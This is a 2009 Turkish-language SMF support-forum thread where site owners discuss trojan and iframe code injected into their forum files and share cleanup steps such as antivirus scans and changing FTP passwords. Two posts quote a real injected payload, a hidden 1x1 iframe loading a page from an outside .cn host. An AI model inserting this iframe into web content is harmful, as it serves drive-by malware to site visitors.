News:

SMF 2.1.4 has been released! Take it for a spin! Read more.

Main Menu

Dosyalarınıza bulaşan trojan kod çeşitleri

Started by husmen73 (Gulhin), March 08, 2009, 06:33:32 AM

Previous topic - Next topic

husmen73 (Gulhin)

Quote from: turklerinneti.com on April 21, 2009, 08:46:16 PM
Quote from: The-Hatip on April 19, 2009, 03:00:04 PM
Kardeşim avast filan boş. Bilgisayarında Başlat > Çalıştır > Msconfig yaz başlangıça gel eğer ntos.exe yazıyorsa tamamdır o bilgisayardan her ftp ye girdiğinizde şifrenizi alır ve her index.php veya index.html veya default isimli dosyaları indexler o yüzden hosting firmaları da anlayamaz benim başıma geldi sorunu anca kendim çözdüm. Hosting firmanızın yapacağı bir iş kalmıyor zaten direk forumun yedeğini alıp silin daha sonra tekrar kurun fakat başka bir pc den yani ntos.exe bulunmayan bi pc den saygılarımla...
Burda ; genel, SYSTEM.INI, WIN.INI, BOOT.INI Gibi bölümler var. Hangisinde ne yapmamız gerekiyor anlayamadım ben bunu.. :)
Zararlı yazılımlarla ilgili doctus.org sitesi var. Oradan destek alabilirsiniz.

Quote from: The-Hatip on April 19, 2009, 03:00:04 PM
Kardeşim avast filan boş.
Avast'ın boş olduğunu nasıl söyleyebiliyorsunuz anlamıyorum. Kullanılan yazılımlar kaçak ve güncellemesi olmazsa zaten bir işe yaramaz.
-Kurumsal Kimlik Web Tasarım Hizmeti.
Gülhin Portal Sistemi hakkında yorumlarınızı bekliyorum.
SMF
Referanslar --> http://www.gulhin.com/referanslar-portfoy/
-Web Tasarımı ve Tema Tasarımı Sitesi www.gulhin.com
-TOPLU MAİL GÖNDERİMİ --> http://www.toplumailsms.com
E-Ticaret Sistemi yaptırmak mı istiyorsunuz?

turanordusu.tc

The Hatip arkadaşımızın verdiği komut ; Geri yükleme komutu şimdi dikkatimi çekti de.  ;) Bunu zaten biliyordum ben.

Zararlı yazılımlar konusundaki verdiğiniz bilgi için teşekkürler. Burdan yardım alıcam.. ;)

abdull@h

#22
ewet arkadaşlar geçenlerde ftpdeki dosyaları kontrol ettiğimde bi tane bende buldum ve siznle paylaşmak istedim mümkünse bunuda eklermisiniz
<iframe frameborder=off src=http://cacbuhub.cn/pa.html width=1 height=1 ></iframe>

Pяηѕѕ LF

#23
Merhaba,

ben hic bir mod veya herhangi bir degisiklik yapmadan sayfanin altinda ie'de hata mesaji aliyorum.

ve dosyalari kontrol ederken asagi yukari butun sayfalarda bu kod vardi. En ust tarafta. ilginc genelde 4 5 satirlik scriptler oluyor bu artik ne ise yariyorsa  :-\ antivirusum genelde zararli trojan scriptler oldugunda ötüyö  :P bunda ses yok.

bu kodlari silmeye calisiyorum her actigim dosyada var  :( silip 444 chmod ayarlari 444 yapiyorum.

ie hatasi bu kod ile ilgisi olmasa gerek siliyorum siliyorum hala mesaj duruyor :) "membre introuvable" hatasi. silmeye devam ediyorum.

altaki kod hakkinda bilgilenderebilirseniz.

kolay gelsin.





// Yağız: Sayfayı aşırı uzattığından kodları kaldırmak zorunda kaldım.
1.1.21 Default

DNA27

aynı bu kod aylarca eklendi ben sildim o geldi o geldi ben sildim :=)
hatırladıgım kadar sizde yazmıştınız bu soruna .

çözümü şunda buldum ilk olarak ftp yi boşalttım antivir ile arattım sonra indexleri aradım tek tek temızledim.

ftp şifremi değiştim file zilla da kayıtlı idi sitem oradan da sildim daha sonra ne gelen ne giden oldu


http://www.simplemachines.org/community/index.php?topic=240751.msg1552494#msg1552494

http://www.simplemachines.org/community/index.php?topic=244570.msg1579562#msg1579562

http://www.simplemachines.org/community/index.php?topic=274959.msg1802205#msg1802205
Sevda Gelmişse başa artıq kıvırmak boşa sen git o sefdanın arkasından koşa koşa

Pяηѕѕ LF

Merhaba,

Ben format attim, dosyalari temizledim tek tek php js txt css ne varsa, ftp sifrelerini degistirdim, host sirketi bizde sorun yok sizde var gibi dedi bana  :D, 2.3 tane son model antivirus ile taradim, trojan malware programlara tarama yaptim vs.. ufak seyler buldu sildi tekrar islemleri yaptim yine olmadi  :) o kadar saatimi verdim yok benim bilgisayarimi cok sevmis olsa gerekki napsam kurtulamiyorum.

Araya araya arkadasim hakkinda bilgi edindim..

son dönemlerin yildizi parlayan scripti.. bizede bulasmis.  :)

Artik hayirlisi olur insAllah diyorum ve bir süre dinlenmeye cekiliyorum  :-\


> Gumblar Injekted Script Hakkinda <

Allah c.c hepinizi bu script'en uzak tutsun.. Amin.
1.1.21 Default

turanordusu.tc

Bu sayfanın yapısı bozuk görünüyor bende arkadaşlar. Son mesajlardan sonra sanırım çok genişlemiş sayfa yanlara doğru. İlk sayfada sorun yok ama bu 2. sayfa bozuk gösteriyor. Sadece bilgi amaçlı söyleyeyim dedim herkeste de böylemi bilmiyorum..

DNA27

Quote from: Pяєηѕєѕ 丂√丂 on May 18, 2009, 03:06:25 PM
Merhaba,

Ben format attim, dosyalari temizledim tek tek php js txt css ne varsa, ftp sifrelerini degistirdim, host sirketi bizde sorun yok sizde var gibi dedi bana  :D, 2.3 tane son model antivirus ile taradim, trojan malware programlara tarama yaptim vs.. ufak seyler buldu sildi tekrar islemleri yaptim yine olmadi  :) o kadar saatimi verdim yok benim bilgisayarimi cok sevmis olsa gerekki napsam kurtulamiyorum.

Araya araya arkadasim hakkinda bilgi edindim..

son dönemlerin yildizi parlayan scripti.. bizede bulasmis.  :)

Artik hayirlisi olur insAllah diyorum ve bir süre dinlenmeye cekiliyorum  :-\


> Gumblar Injekted Script Hakkinda <

Allah c.c hepinizi bu script'en uzak tutsun.. Amin.

Amin  :) şimdide iframe virüsü çıktı yeni olarak bu daha da kötü :)

Sevda Gelmişse başa artıq kıvırmak boşa sen git o sefdanın arkasından koşa koşa

djasikurt

bu iframe  vürüsü her kese vürüs salıyor yavs bundan kökten nasıl kurtuluruz siliyorum geri geliyor


www.yildirimyildizdogan.net  YILDIRIM YILDIZDOGAN SEVENLER DİYARİ

abraham_

S.a
Arkadaşlar siteye ilk girdiğimde giriş yapın diye çıkan safyfa açılıyor.Ancak giriş yaptığım anda virüs programı uyarı verip bağlantıyı kesiyor.İndex.php ve index.htm dosyalarında üç ayrı iframe bulup sildim daha önce sitenin yüzünü dahi göremeden kapanıyordu.Ancak şimdi giriş yaptıktan sonra veya her hangi bir kategoriye girdikten sonra virüs programı kapatıyor.Yardımcı olursanız çok sevinirim arkadaşlar...

husmen73 (Gulhin)

Quote from: abraham_ on July 10, 2009, 02:59:06 AM
S.a
Arkadaşlar siteye ilk girdiğimde giriş yapın diye çıkan safyfa açılıyor.Ancak giriş yaptığım anda virüs programı uyarı verip bağlantıyı kesiyor.İndex.php ve index.htm dosyalarında üç ayrı iframe bulup sildim daha önce sitenin yüzünü dahi göremeden kapanıyordu.Ancak şimdi giriş yaptıktan sonra veya her hangi bir kategoriye girdikten sonra virüs programı kapatıyor.Yardımcı olursanız çok sevinirim arkadaşlar...
Tüm dosyalarınızı virüse karşı kontrol etmelisiniz. Bende Avast Home var, bununla FTP'den tüm dosyaları indirip tarattığımda bana hangi dosyalarda virüs varsa gösteriyor. Bu yöntemi kullanabilirsiniz. (Avast güvenlik seviyesi en yüksekte)
-Kurumsal Kimlik Web Tasarım Hizmeti.
Gülhin Portal Sistemi hakkında yorumlarınızı bekliyorum.
SMF
Referanslar --> http://www.gulhin.com/referanslar-portfoy/
-Web Tasarımı ve Tema Tasarımı Sitesi www.gulhin.com
-TOPLU MAİL GÖNDERİMİ --> http://www.toplumailsms.com
E-Ticaret Sistemi yaptırmak mı istiyorsunuz?

abraham_

Tüm dosyaları indirip avast 4.8 professionel ile tarattım birşey bulamadı.Olmadı karspersky 7.0 ile tarattım yine bir şey bulamadım.Ben bütün index.php dosyalarına kendim elimden geldiğice bakmaya çalıştım.Daha önce sitenin yüzünü dahi göremiyordum bütün index.php dosyalarında iframe vardı sildim onları site açıldı yani artık açılırken virüs uyarısı yapmıyor.Ayrıca temizlediğim tüm dosyaların izinlerinide 555 yaptım.Şimdi ise giriş yapınca veya her hangi bir kategoriye tıklayınca uyarı yapıyor avast ve uyarıda index.htm dosyasını gösteriyor ama benim ftpdeki dosyalarda index.php dışında index dosyası göremedim... :(

abraham_

Sorun çözüldü arkadaşlar şu linkteki http://www.simplemachines.org/community/index.php?topic=323533.0 program ile dosyaları taratınca iframin bulunduğu tüm dosyaları bulabildim.Herkese kolay gelsin...

cee山


turanordusu.tc

Ben merak ettiğim için bişey sormak istiyorum; Bu virüs kodlarını  bi not defterinin içine yapıştırıp, masaüstüne alsak ve ben açsam, bizim bilgisayara da bulaşırmı bu ? :)

husmen73 (Gulhin)

Quote from: turklerinneti.com on July 23, 2009, 04:42:04 AM
Ben merak ettiğim için bişey sormak istiyorum; Bu virüs kodlarını  bi not defterinin içine yapıştırıp, masaüstüne alsak ve ben açsam, bizim bilgisayara da bulaşırmı bu ? :)
Kodların kendisi mi virüs yoksa internet üzerinden otomatik mi indiriliyor buna bağlı. Sayfa açıldığında internetten indiriliyorsa ve internetin yoksa haliyle birşey olmayacaktır.
-Kurumsal Kimlik Web Tasarım Hizmeti.
Gülhin Portal Sistemi hakkında yorumlarınızı bekliyorum.
SMF
Referanslar --> http://www.gulhin.com/referanslar-portfoy/
-Web Tasarımı ve Tema Tasarımı Sitesi www.gulhin.com
-TOPLU MAİL GÖNDERİMİ --> http://www.toplumailsms.com
E-Ticaret Sistemi yaptırmak mı istiyorsunuz?

turanordusu.tc

<iframe frameborder=off src=http://cacbuhub.cn/pa.html width=1 height=1 ></iframe>
Bunun gibi yada daha büyük virüs kodlarını, Not pad'e yapıştırıp, masaüstüne atsam ve daha sonra bunu sadece dosya olarak açsam demiştim bulaşırmı bizim bilgisayara da acaba ? ;)

turanordusu.tc

Bununla ilgili kesin çözümü buldum ve sizinle de paylaşmak istedim arkadaşlar. Bu yöntemi  daha önceden de kullanmıştım ama dün akşam ne kadar faydalı olduğunun farkına vardım.
http://onecare.live.com/site/tr-tr/default.htm burda koruma ve temizleme diye iki seçenek var. Bunların ikisini de ayrı ayrı yapın. Virüs bulaşmış tüm dosyalarınızı sildiğini göreceksiniz. Bunu yapmadan önce, çok önemli dosyalarınız varsa onların yedeğini alın ama (Temiz olduğunu düşündüklerinizin) Çünkü bulduğu tüm zararlı dosyaları siliyor.. Kolay gelsin. ;)

mustea



Advertisement: